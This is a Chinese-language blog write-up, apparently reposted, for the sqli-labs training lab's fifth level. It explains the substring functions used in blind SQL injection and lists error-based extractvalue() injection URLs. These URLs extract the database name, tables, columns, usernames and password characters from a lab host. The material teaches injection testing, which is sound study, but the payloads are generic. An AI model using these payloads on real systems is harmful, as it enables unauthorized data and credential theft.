sqli-labs-master 盲注+第五关

一、基于布尔 SQL 盲注

1、构造逻辑判断

(1)sql注入截取字符串常用涵数

 在sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也称为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。

函数:mid()  substr()   left()

mid()函数为截取字符串一部分。mid(column_name,start,length)

column_name 必需,要提取字符的字段

start                必需,规定开始位置(起始为1)

length            可选,要返回的字符数,如果省略则返回剩余文本

eg:str="123456" mid(str,2,1)  结果为2

substr()

 Substr()和substring()函数实现的功能是一样的,均为截取字符串。

    string substring(string, start, length)

    string substr(string, start, length)

    参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度

left()函数

Left()得到字符串左部指定个数的字符

Left ( string, n )        string为要截取的字符串,n为长度。

•基于时间的 SQL 盲注--延时注入

•基于报错的 SQL 盲注-构造 payload 让信息通过错误提示回显出来

第五关

爆数据库:http://10.10.32.165/sqli-labs-master/Less-5?id=1' and extractvalue(1,concat(0x23,database(),0x23))--+

 爆表名:http://10.10.32.165/sqli-labs-master/Less-5?id=1' and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x23))--+

 爆列名:http://10.10.32.165/sqli-labs-master/Less-5?id=1' and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+

 爆数据:http://10.10.32.165/sqli-labs-master/Less-5?id=1' and extractvalue(1,concat(0x23,(select username from users limit 1,1),0x23))--+

爆密码时密码不全,要用截取函数截取剩下的密码

and extractvalue(1,concat(0x23,substr((select password from users limit 0,1),32,1),0x23))

猜你喜欢

转载自www.cnblogs.com/gudexiao-1996/p/11718377.html